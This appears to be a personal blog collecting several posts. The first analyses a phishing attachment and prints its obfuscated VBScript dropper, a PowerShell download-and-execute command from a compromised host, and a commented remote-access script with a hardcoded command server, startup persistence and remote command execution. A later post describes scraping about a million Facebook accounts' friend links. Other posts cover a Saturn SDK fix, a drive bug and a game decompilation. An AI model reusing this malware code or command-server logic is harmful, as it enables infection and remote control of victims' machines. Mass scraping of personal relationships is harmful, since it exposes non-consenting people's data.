Quick analysis of a malware

I just received a spam e-mail impersonating the French social security ("Assurance Maladie"), which tells me to download my tax statement which they have graciously attached.

There are multiple things to notice here:

  • the sender address: [email protected]
  • onmicrosoft.com is used by Office 365 addresses, so they probably used Azure or something like that
  • the whole message is a picture, probably a screenshot of a real e-mail. Well, at least that way they don't write a fake message in broken Google-Translated French

Now, the attachments.

No PDF file, that's unusual, it's quite common for this kind of spam, but rejoice! we have a VBScript file right there.

(the CSV file and the .bin file don't contain anything interesting, or at least I didn't find anything interesting in them)

Here is the VBS file, raw as I received it:

on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:JPHgjNP = replace("WiDDXetmcript.iDDXetmhEll","iDDXetm","s"):Set cfAKtQG = CreateObject(JPHgjNP ):izZHSpc = Replace("POWlZsTwIURSHlZsTwIULL","lZsTwIU","E"):WScript.Sleep 2000:WScript.Sleep 2000:cfAKtQGcfAKtQGNXPDFLW = "  $00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X":cfAKtQG.Run(izZHSpc+cfAKtQGcfAKtQGNXPDFLW+""),0,True:Set cfAKtQG = Nothing

Quite unreadable, if you ask me. Here is it after replacing all the : by line breaks, after evaluating the replace( calls and merging all the strings together:

on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
WScript.Sleep 2000
WScript.Sleep 2000
CreateObject("Wscript.shEll").Run("POWERSHELL  $00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X"),0,True

Sleeps 4 seconds and runs PowerShell with some weird code. Let's have a look at the PowerShell code:

$00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X

Let's remove all those <##>s and merge all those strings:

[System.Threading.Thread]::Sleep(2300);
[System.Threading.Thread]::Sleep(2300);
[System.Threading.Thread]::Sleep(2300);
$8ZRVUBH=I`E`X ('(New-Object Net.WebClient).DownloadString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')' -Join '')|I`E`X

Much more readable! So this is just sleeping about 7 seconds and then... it downloads a text file... and runs it? Let's have a look at the link.

upv.es is the official website of the Universitat Politècnica de València (Technical University of Valencia). webs.upv.es is the subdomain corresponding to the Web hosting service provided by the university. cursosinf.webs.upv.es corresponds, I can only guess, to the IT department of the school.

The website is empty at the time I'm writing:

But the file itself is still online, and looks like this:

try
{
$OutPath = "C:\ProgramData\Links"
if (-not (Test-Path $OutPath))
        {
            New-Item $OutPath -ItemType Directory -Force
        }

(New-Object Net.WebClient).DownloadFile('https://cursosinf.webs.upv.es/wp-includes//js/jcrop/1.txt', 'C:\ProgramData\Links\1.bat')
Start-Sleep 3
start C:\ProgramData\Links/1.bat

Start-Sleep 10

$Content = @'
<binary content>

This downloads a batch file which we'll analyse later.

Right now, it's creating an(other) VBS file (comments are mine):

On error resume next

Public IP, Port, SPL, A, StartupCheck

Set WshNetwork = CreateObject("Wscript.Network")
Set MyObject = CreateObject("Wscript.Shell")

' C&C (Command and Control server)
IP = "185.81.157.26"
Port = "5734"
StartupCheck = "True"
SPL = "|" & "V" & "|"

' Sends an AJAX request
Function POST(ByVal DA, ByVal Param)
	On error resume next
	Dim MSXML, PO, HTTP, UserAgent
	MSXML = "Microsoft.XMLHTTP"
	PO = "POST"
	HTTP = "http://"
	UserAgent = "User-Agent:"
	
	Dim ResponseText
	Set ObjHTTP = CreateObject(MSXML)
	ObjHTTP.Open PO, HTTP & IP & ":" & Port & "/" & DA, False
	ObjHTTP.SetRequestHeader UserAgent, INF
	ObjHTTP.Send Param
	ResponseText = ObjHTTP.ResponseText
	POST = ResponseText
End Function

' Installs the current script in the Startup folder, so that it gets executed at each boot
Sub Installation()
If StartupCheck = "True" Then
	Set FSO = CreateObject("Scripting.FileSystemObject")
	FSO.CopyFile Wscript.ScriptFullName, MyObject.SpecialFolders("Startup") & "\Install32.vbs"
End If
End Sub

Call Installation

Function RandomString()
    Dim str, min, max
    Const LETTERS = "ABCDEFGHIJKLMOPQRSTVWXYZ0123456789"
    min = 1
    max = 15
    Randomize
    For i = 1 to 15
        str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 )
    Next
    RandomString = str
End Function

' Fetches the version info using WMIC to know what Windows version the computer is running
Function HWID
	Dim objWMIService, colItems, result
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set colItems = objWMIService.ExecQuery("SELECT Version FROM Win32_ComputerSystemProduct")
	For Each objItem in colItems
		result = result & objItem.IdentifyingNumber
	Next
	HWID = result
End Function

' Generates a string with the format 
' \PCNAME\Account\Microsoft Windows 10 Professionnel\Windows Defender\Yes\Yes\FALSE\
Function INF
	Dim VR, AV, OS, PC, USER, ID
	VR = "v0.2"
	AV = "Windows Defender"
	PC = WshNetwork.ComputerName
	USER = WshNetwork.UserName
	ID = HWID
		
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set colItems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem",,48)
	For Each objItem in colItems
		OS = OS + objItem.Caption
	Next
	INF = ID & "\" & PC & "\" & USER & "\" & OS & "\" & AV & "\" & "Yes" & "\" & "Yes" & "\" & "FALSE" & "\"
End Function

' Creates a file, fills it with the specified content
' If the extension is PS1, run it with PowerShell
' Otherwise, run it directly
Sub CreateEmptyFile(ByVal Content, ByVal Filename)
	Set FSO = CreateObject("Scripting.FileSystemObject")
	Set FileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile(FSO.GetSpecialFolder(2) & "\" & Filename, 2, True)
	FileToWrite.WriteLine(Content)
	FileToWrite.Close
	Set FileToWrite = Nothing
	WScript.Sleep 2000
	If InStr(Filename, ".PS1") = 0 Then
		MyObject.RuN FSO.GetSpecialFolder(2) & "\" & Filename
	Else
		MyObject.ruN "POWERSHELL -EXECUTIONPOLICY REMOTESIGNED -FILE " + FSO.GetSpecialFolder(2) & "\" & Filename, 0
	End If
End Sub

' The interesting part!
' The main control loop
' This fetches, every 3 seconds, a "command" from the C&C server
' This is how the server "tells" the infected computer what to do
Do While True
	A = Split(POST("Vre", ""), SPL)
	Select Case A(0)
    	' creates and run a file with content and filename
		Case "RF"
			CreateEmptyFile A(1), A(2)
        ' creates and run a PowerShell file with content and random filename
		Case "TR"
			CreateEmptyFile A(1), RandomString & ".PS1"
        ' stops the control script
		Case "Cl"
			Wscript.Quit
        ' creates and run a VBscript file with content and random filename
		Case "exc"
			CreateEmptyFile A(1), RandomString & ".vbs"
        ' same as RF, no idea why they made two of them
		Case "Sc"
			CreateEmptyFile A(1), A(2)
        ' same as Cl
		Case "Un"
			Wscript.Quit
	End Select
	WScript.Sleep 3000
Loop

The VBS file is then saved and launched:

'@
Set-Content -Path C:\ProgramData\Links\install.vbs -Value $Content

Start-Sleep 3
start C:\ProgramData\Links\install.vbs

} catch { }

It's quite interesting how "simple" the virus is, really. At the bottom of it, it's just a loop that infinitely POSTs to a server and does something depending on the response.

Six handshakes away

Have you ever heard about "six degrees of separation"? It's about the famous idea that there are always less than about six persons between two individuals chosen at random in a population. Given enough people, you'll always find someone whose uncle's colleague has a friend that knows your nextdoor neighbour.

Fun fact: it's where the name of the long-forgotten social network sixdegrees.com came from.

Mathematically, it checks out. If you have 10 friends and each of those friends has 10 friends, in theory that's a total of 1+10+9*10=101 individuals. In practice, when you have 10 friends, they probably know each other as well, and their friends most probably do too. You end up with way fewer than 101 people, and no two persons in your "social graph" ever end up more than one or two handshakes away from each other.

In graph theory, those kinds of graphs where you have densely connected communities, linked together by "hubs", i.e. high-degree nodes, are called "small-world networks".

Oh you know Bob? Isn't it a small world!

I learned about it a few weeks ago in a very nice (French) video on the subject, and immediately thought "I wonder what the graph of everyone I know looks like". Obviously, I can't exhaustively list every single person I've met in my life and put them on a graph.

Or can I?


One of the few good things™ Facebook gave us is a really fast access to petabytes of data about people we know, and especially our relationships with them. I can open up my childhood best friend's profile page and see everyone he's "friends" with, and click on a random person and see who they're friends with, et cætera. So I started looking for the documentation for Facebook's public API which, obviously, exists and allows for looking up this kind of information. I quickly learned that the exact API I was looking for didn't exist anymore, and all of the "alternative" options (Web scrapers) I found were either partially or completely broken.

So I opened up PyCharm and started working on my own scraper, that would simply open up Facebook in a Chromium Webdriver instance, and fetch data using ugly XPath queries.

def query(tab):
    return "//span[text() = '" + tab + "']/ancestor::div[contains(@style, 'border-radius: max(0px, min(8px, ((100vw')]/div[1]/div[3]/div"
Truly horrible.

After 180 lines and some testing, I had something that worked.

Basically, the script loads a Facebook account's friends list page and scrolls to the bottom, waiting for the list to dynamically load until the end, and then fetches all the links in a specific <div> which each conveniently contain the ID of the friend. It then adds all of those IDs to the stored graph, and iterates through them and repeats the whole process. It's a BFS (breadth-first-search) over webpages.

In the past few years, a lot of people started realizing just how much stuff they were giving away publicly on their Facebook profile, and consequently made great use of the privacy settings that allow, for example, restricting who can see your friends list. A small step for man, but a giant leap in breaking my scraper.‌‌ People with a private friends list appear on the graph as leaves, i.e. nodes that only have one neighbour. I ignore those nodes while processing the graph.

It stores the relationships as adjacency lists in a huge JSON file (74 MiB as I'm writing), which are then converted to GEXF using NetworkX.

Now in possession of a real graph, I can fire up Gephi and start analyzing stuff.


The graph you're seeing contains around 1 million nodes, each node corresponding to a Facebook account and each edge meaning two accounts are friends. The nodes and edges are colored according to their modularity class (fancy name for the virtual "community" or "cluster" they belong to), which was computed automatically using equally fancy graph-theoretical algorithms.

At 1 million nodes, the time necessary to layout the graph and compute the useful measurements is about 60 hours (most of which is spent on calculating the centrality for each node) on my 4th-gen i7 machine.

About those small-world networks. One of their most remarkable properties is that the average length of the shortest path between two nodes chosen at random grows proportionally to the logarithm of the total number of nodes. In other words, even with huge graphs, you'll usually get unexpectedly short paths between nodes.

But what does that mean in practice? On this graph, there are people from dozens of different places where I've lived, studied, worked. Despite that, my dad living near Switzerland is only three handshakes away from my colleagues in the other side of the country.

More formally, the above graph has a diameter of 7. That means that there are no two nodes on the graph that are more than 6 "online handshakes" away from each other.

In the figure above, we can see the cumulative distribution of degrees on the graph. For a given number N, the curve shows us how many individuals have N or more friends. Intuitively, the curve is monotonically decreasing, because as N gets bigger and bigger, there are less and less people having that many friends. On the other hand, almost everyone has at least 1 friend.

You'll maybe notice a steep hill at the end, around N=5000. This is due to the fact that 5000 is the maximum number of friends you can have on Facebook; so you'll get many people with a number of friends very close to it simply because they've "filled up" their friends list.

We can enumerate all pairs of individuals on the graph and compute the length of the shortest path between the two, which gives the following figure:

In this graph, the average distance between individuals is 3.3, which is slightly lower than the one found in the Facebook paper (4.7). This can be explained by the fact that the researchers had access to the entire Facebook database whereas I only have access to the graph I obtained through scraping.

(PDF) The Anatomy of the Facebook Social Graph
PDF | We study the structure of the social graph of active Facebook users, the largest social network ever analyzed. We compute numerous features of the... | Find, read and cite all the research you need on ResearchGate
The Facebook paper

Fix for the Psy-Q Saturn SDK

If you ever want to write code for the Sega Saturn using the Psy-Q SDK (available here), you may encounter a small problem with the toolset when using #include directives.

Example:

#include "abc.h"

int main()
{
    int b = a + 43;
    return 0;
}
main.c
C:\Psyq\bin>ccsh -ITHING/ -S main.c
build.bat
int a = 98;
abc.h

This will crash with the following error: main.c:1: abc.h: No such file or directory, which is quite strange given that we explicitely told the compiler to look in that THING folder.

What we have:

  • CCSH.EXE : main compiler executable (C Compiler Super-H)
  • CPPSH.EXE preprocessor (C PreProcessor Super-H)

CCSH calls CPPSH with the source file first to get a raw code file to compile, and then actually compiles it. Here, we can see by running CPPSH alone that it still triggers the error, which means the problem effectively comes from CPPSH. After a thorough analysis in Ida, it seems that even though the code that handles parsing the command-line parameters related to include directories, those paths aren't actually added to the program's internal directory array and thus never actually used. I could have decompiled it and fixed it myself, but I found a faster and simpler way: use the PSX one.

Though CCSH and CCPSX are very different in nature (one compiles for Super-H and one for MIPS), their preprocessors are actually almost identical – when we think about it, it makes sense: the C language doesn't depend on the underlying architecture (most of the time), so why would its preprocessor do?

So here's the fix: rename CCSH to something else and copy CCPSX to CCSH. Solves all problems and finally allows compiling C code for the Sega Saturn on Windows (the only other working SDK on the Internet is for DOS, which requires using DOSBox and 8.3 filenames, which makes big projects complicated to organize).

That's nice and all but can we compile actual code? Seems that the answer is no. Here is a basic file:

#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%d\n", 42);

	return 0;
}

Compiling this will give the following error:

In file included from bin/main.c:2:
D:\SATURN\INCLUDE\stdlib.h:7: conflicting types for 'size_t'
D:\SATURN\INCLUDE\stddef.h:166: previous declaration of 'size_t'

Weird, eh?

It seems that the STDLIB.H file in the SDK is somehow wrong, in that it has the following at the top:

#ifndef	__SIZE_TYPE__DEF
#define	__SIZE_TYPE__DEF	unsigned int
typedef	__SIZE_TYPE__DEF	size_t;
#endif
STDLIB.H

Whereas its friend STDDEF.H looks like this:

#ifndef __SIZE_TYPE__
#define __SIZE_TYPE__ long unsigned int
#endif
#if !(defined (__GNUG__) && defined (size_t))
typedef __SIZE_TYPE__ size_t;
#endif /* !(defined (__GNUG__) && defined (size_t)) */
STDDEF.H

Two incompatible declarations, the compiler dies. The simple fix is to remove the DEF at the end of the names in STDLIB.H, to get something like this:

#ifndef	__SIZE_TYPE__
#define	__SIZE_TYPE__	unsigned int
typedef	__SIZE_TYPE__	size_t;
#endif
STDLIB.H

Solving bizarre hard drive corruption issues

I've recently encountered some pretty weird problems with my two USB3 external hard drives. Disk disconnecting when opening specific files, and refusing to reconnect on the computer until I plug it into another computer, then it works again, and so on.

Then I started noticing a pattern. The files that trigger the crash are always files that I have opened on another computer with that hard drive, which should give you a clue on what this might be about.

It seems that there's a bug in Windows' drive ejection system, which basically means that if you plug a hard drive on a computer, open a file in any software that keeps the descriptor open all the time (I'm looking at you, IDA Pro), and then eject the drive without closing the software first (which sometimes happens), the file will somehow still be marked as open in the NTFS attributes, and when you'll try to open it on another computer, Windows will flip out and disconnect the hard drive. And until you plug the HDD back on the other computer, it will refuse to read it on the first one, showing as RAW in the management console, even in another OS (I tried Ubuntu and FreeBSD) as long as you stay on that computer. But then, if you do plug it back, then it will magically unlock and it will work again on all computers. This took me about a week to figure out. Hope it'll have helped you figure it out in less time than me.

TOMB5 - Feb'19 status update

The project has come a long way since June of 2017.

Since the beginning of the project, the codebase has been divided into two separate branches: PC and PSX, which share a common "GAME" folder which contains the platform-independent game logic code.

More progress has been made on the PSX version since a lot of code is plain old MIPS assembly which we haven't had to decompile to C, so the PC version is still lagging behind. Problems with the old DirectX version used by the game (DX5) makes all of this much harder.

Also, debugging the PSX version has always been a pain in the ass because of the need to run it in an emulator (we've used no$psx most of the time).

To solve that problem, we've started working on what we call the Emulator, which is simply put an implementation of the PSY-Q PSX SDK acting as an HLE emulator for the game. That way, we can debug the game directly in VS which is quite appreciable. We simply need to link the game binary against our emulator DLL instead of the standard PSY-Q libs. The emulator is based on SDL for windowing and OpenGL for 3D rendering.

Behold, pics.

Title screen
Secret cutscene menu used for debugging purposes, only reachable through RAM editing
Internal beta title screen
Game load screen
Level loading screen

You can check the code out on GitHub.